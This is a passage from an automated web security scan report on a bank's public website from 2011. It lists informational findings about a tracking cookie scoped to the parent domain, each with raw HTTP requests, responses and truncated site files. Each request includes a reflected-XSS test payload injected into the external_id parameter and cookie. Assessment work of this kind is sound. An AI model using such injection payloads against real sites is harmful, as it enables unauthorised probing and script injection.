User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=336BE560308D6ECB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:27 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5428
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
Page Breadcrumb, Heading, and Secondary Navigation Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: d
...[SNIP]...

9.21. http://www.capitalone.com/img/global/icon/lock.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/icon/lock.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=8EA70C0FA4A60600; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/global/icon/lock.gif HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=8EA70C0FA4A60600; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Thu, 13 Aug 2009 17:20:04 GMT
Accept-Ranges: bytes
Content-Length: 486
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/gif
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

GIF89a.. .................@I.y................R+E...............Y......Q.....................................!.......,...... ....` ..R..@.H3.".
.q.(...g..C...d
).....NJMJ..)...f&.!S;...@Li...q.."..d.(
...[SNIP]...

9.22. http://www.capitalone.com/img/global/logo/ehl.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/ehl.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=E628BAC2937BAB66; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/global/logo/ehl.png HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:38 GMT
Server: Apache
Set-Cookie: v1st=E628BAC2937BAB66; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: max-age=3600
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Mon, 29 Jun 2009 18:38:55 GMT
Accept-Ranges: bytes
Content-Length: 448
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/png
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

.PNG
.
...IHDR.............U.oY....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...3PLTE...........................................................tRNS.................%..b....IDATx...... .Di..f
...[SNIP]...

9.23. http://www.capitalone.com/img/global/logo/fdic.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/fdic.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=34DF7D6482753A91; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/global/logo/fdic.png HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:37 GMT
Server: Apache
Set-Cookie: v1st=34DF7D6482753A91; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: max-age=3600
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Mon, 29 Jun 2009 18:38:55 GMT
Accept-Ranges: bytes
Content-Length: 549
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/png
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

.PNG
.
...IHDR...a.........E.#.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...0PLTE................................................&.......tRNS.................#]...._IDATx...... .........{
...[SNIP]...

9.24. http://www.capitalone.com/img/global/logo/sprite/header.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/sprite/header.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=416EE042D34F4E42; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/global/logo/sprite/header.gif HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=416EE042D34F4E42; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Mon, 29 Jun 2009 18:38:55 GMT
Accept-Ranges: bytes
Content-Length: 6003
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/gif
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

GIF89a........aL...:z..SZ.q[.......{d..............jb......jj.C3.iS.ZE...$j............t...R...46.......L:..|............].....W...v{...i..t............zn....dj.U.....CG.........6v.....;..dP...E...`..
...[SNIP]...

9.25. http://www.capitalone.com/js/component/portal_accordion.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_accordion.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=9A9F2B2775C2D986; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/component/portal_accordion.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=9A9F2B2775C2D986; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 3659
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

//Declare variables
var activeItem = 1;
var animationDuration = 900;
var hrefAttr = "";
var titleAttr = "";

//Define default animation easing
jQuery.easing.def = "easeInOutCubic";

//Collaps
...[SNIP]...

9.26. http://www.capitalone.com/js/component/portal_open_account.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_open_account.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=54FB887DB689A0C6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/component/portal_open_account.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:35 GMT
Server: Apache
Set-Cookie: v1st=54FB887DB689A0C6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 403
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

$('#btn_continue').click(function()
{
if ($('#promo').attr('value').length == 9)
{
var itc = $.cookie('itc');
if (itc.length == 25)
{
$.cookie('tmp_offer',itc.substr(23,2)
...[SNIP]...

9.27. http://www.capitalone.com/js/component/portal_swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_swfobject.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=C10919DDE4849D4F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/component/portal_swfobject.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:35 GMT
Server: Apache
Set-Cookie: v1st=C10919DDE4849D4F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 10223
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/* SWFObject v2.2 <http://code.google.com/p/swfobject/>
is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject=function(){var D="undefined",r="ob
...[SNIP]...

9.28. http://www.capitalone.com/js/component/portal_utilitynav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_utilitynav.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=621B246FA5B61ECD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/component/portal_utilitynav.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:35 GMT
Server: Apache
Set-Cookie: v1st=621B246FA5B61ECD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 178
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

// Adds the class "last" to the last item in the
// utility links to remove the right border
$(document).ready(function(){
$('#utility-links li:last').addClass('last');
});

9.29. http://www.capitalone.com/js/global/cof/portal_header.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/cof/portal_header.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=A664F526D8F83526; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global/cof/portal_header.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=A664F526D8F83526; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 32517
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

Cof = Cof || {};

Cof.Header = function() {

var c1server = window.location.protocol + "//" + window.location.hostname;

if(window.location.port != null){
c1server = c1server + ":" + win
...[SNIP]...

9.30. http://www.capitalone.com/js/global/cof/portal_headerFooter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/cof/portal_headerFooter.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=36F95AE8B71D2AB1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global/cof/portal_headerFooter.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=36F95AE8B71D2AB1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
